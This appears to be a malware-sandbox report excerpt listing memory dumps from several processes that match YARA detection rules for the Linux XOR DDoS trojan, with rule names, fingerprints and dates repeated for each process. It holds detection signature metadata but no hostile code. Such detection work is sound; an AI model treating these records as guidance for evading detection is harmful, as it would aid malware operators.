Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6358.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6344.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
